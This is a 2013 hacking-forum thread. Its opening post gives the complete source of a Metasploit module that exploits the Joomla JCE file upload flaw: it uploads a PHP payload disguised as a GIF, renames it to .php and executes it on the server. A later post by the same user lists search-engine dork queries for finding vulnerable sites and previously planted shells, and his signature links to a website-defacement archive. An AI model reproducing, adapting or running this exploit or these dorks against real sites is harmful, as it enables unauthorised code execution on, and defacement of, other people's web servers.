Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


JCE File Upload Remote msf/core Metasploit

  • 0 Vote(s) - 0 Average


09-04-2013, 03:08 AM #1
DZ27 Offline Member ***
Registered
Posts:54 Threads:15 Joined:Aug 2013 Reputation: 0
Mood: None
Code:
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Joomla Component JCE File Upload Remote Code Execution',
      'Description'    => %q{
          This module exploits a vulnerability  in the JCE component for Joomla!, which
      could allow an unauthenticated remote attacker to upload arbitrary files, caused by the
      fails to sufficiently sanitize user-supplied input. Sending specially-crafted HTTP
      request, a remote attacker could exploit this vulnerability to upload a malicious PHP
      script, which could allow the attacker to execute arbitrary PHP code on the vulnerable
      system. This module has been tested successfully on the JCE Editor 1.5.71 and Joomla
      1.5.26.
      },
      'Author'         =>
        [
          'Unknown', # From AmnPardaz Security Group # Vulnerability discovery and PoC
          'Heyder Andrade <eu[at]heyderandrade.org>' # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['BID', '49338'],
          ['EDB', '17734']
        ],
      'Payload'        =>
        {
          'Space'       => 4000, # only to prevent error HTTP 414 (Request-URI Too Long)
          'DisableNops' => true,
          'BadChars'    => "#",
          'Keys'        => ['php']
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [[ 'Automatic', { }]],
      'Privileged'     => false,
      'DisclosureDate' => 'Aug 2 2012',
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('TARGETURI', [true, "Joomla directory path", "/"])
        ], self.class)
  end


  def get_version
    # check imgmanager version
    @uri_base     = normalize_uri(target_uri.path.to_s, 'index.php')
    @vars_get_base   =    {
      'option'=> 'com_jce',
      'task'  => 'plugin',
      'plugin'=> 'imgmanager',
      'file'  => 'imgmanager'
    }
    print_status("Checking component version to #{datastore['RHOST']}:#{datastore['RPORT']}")
    res = send_request_cgi({
      'uri'     => @uri_base,
      'vars_get' => @vars_get_base,
      'method'  => 'GET',
      'version' => '1.1'
    })

    version = nil
    if (res and res.code == 200)
      res.body.match(%r{^\s+?<title>Image\sManager\s:\s?(.*)<})
      version = $1.nil? ? nil : $1
    end

    return version
  end

  def check
    version = ( get_version || '').to_s

    if (version.match(%r{1\.5\.7\.1[0-4]?}))
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end


  def upload_gif
    # add GIF header
    cmd_php = "GIF89aG\n<?php #{payload.encoded}  ?>"

    # Generate some random strings
    @payload_name    = rand_text_alpha_lower(6)
    boundary       = '-' * 27 + rand_text_numeric(11)

    parms       = {'method'=> 'form'}
    parms.merge!(@vars_get_base)

    # POST data
    post_data = Rex::MIME::Message.new
    post_data.bound = boundary
    post_data.add_part("/", nil, nil, "form-data; name=\"upload-dir\"")
    post_data.add_part("", "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"\"")
    post_data.add_part("0", nil, nil, "form-data; name=\"upload-overwrite\"")
    post_data.add_part("#{cmd_php}", "image/gif", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}.gif\"")
    post_data.add_part("#{@payload_name}", nil, nil, "form-data; name=\"upload-name\"")
    post_data.add_part("upload", nil, nil, "form-data; name=\"action\"")

    data = post_data.to_s

    res = send_request_cgi({
      'uri'      => @uri_base,
      'vars_get'   => parms,
      'method'    => 'POST',
      'version'   => '1.1',
      'data'      => data,
      'ctype'    => "multipart/form-data; boundary=#{post_data.bound}"
    })

    if (res and res.code = 200 )
      return :access_denied if (res.body =~ /RESTRICTED/i)
      print_good("Successfully uploaded #{@payload_name}.gif")
    else
      print_error("Error uploading #{@payload_name}.gif")
      return :abort
    end

    return :success

  end

  def renamed?
    # Rename the file from .gif to .php

    data =  "json={\"fn\":\"folderRename\",\"args\":[\"/#{@payload_name}.gif\",\"#{@payload_name}.php\"]}"

    print_status("Change Extension from #{@payload_name}.gif to #{@payload_name}.php")

    res = send_request_cgi(
      {
        'uri'       => @uri_base,
        'vars_get'  => @vars_get_base,
        'method'    => 'POST',
        'version'   => '1.1',
        'data'       => data,
        'ctype'     => 'application/x-www-form-urlencoded; charset=utf-8',
        'headers'   =>
        {
          'X-Request' => 'JSON'
        }
      })
    if (res and res.code == 200 )
      print_good("Renamed #{@payload_name}.gif to #{@payload_name}.php")
      return true
    else
      print_error("Failed to rename #{@payload_name}.gif to #{@payload_name}.php")
      return false
    end
  end

  def call_payload
    payload = "#{@payload_name}.php"
    print_status("Calling payload: #{payload}")
    uri = normalize_uri(target_uri.path.to_s, "images", "stories", payload)
    res = send_request_cgi({
      'uri'  => uri,
      'method'    => 'GET',
      'version'   => '1.1'
    })
  end



  def exploit

    return if not check == Exploit::CheckCode::Vulnerable
    if upload_gif == :success
      if renamed?
        register_files_for_cleanup("#{@payload_name}.php")
        call_payload
      end
    end

  end

end

http://zone-h.org/archive/notifier=dz27


[Image: 1175555_579603955414710_1932810767_n.jpg]


:rolleyes:

09-04-2013, 03:17 AM #2
sniffer Offline Bug Researchers **********
Junior Administrator
Posts:878 Threads:126 Joined:Sep 2012 Reputation: 12
Mood: Happy
Thanks bro , Published : 2013.03.27

jabber : [email protected]

09-04-2013, 03:53 AM #3
DZ27 Offline Member ***
Registered
Posts:54 Threads:15 Joined:Aug 2013 Reputation: 0
Mood: None
PHP Code:
    
inurl
:/index.php?option=com_jce

 inurl
:/index.php?option=com_virtuemart

 inurl
:/images/stories/3xp.php

 inurl
:/images/stories/0day.php

 inurl
:/images/stories/

 
inurl:/images/storiesphp 

http://zone-h.org/archive/notifier=dz27


[Image: 1175555_579603955414710_1932810767_n.jpg]


:rolleyes:

11-25-2013, 04:09 AM #4
h4r5h Offline Junior Member **
Registered
Posts:11 Threads:3 Joined:Nov 2013 Reputation: 0
Mood: None
sps browink

04-12-2014, 08:08 AM #5
cr4zy h4x0r Offline Junior Member **
Registered
Posts:28 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: None
Nice share..

:at:[Image: kfOxWL.jpg]






Forum Jump:


Users browsing this thread:1 Guest(s)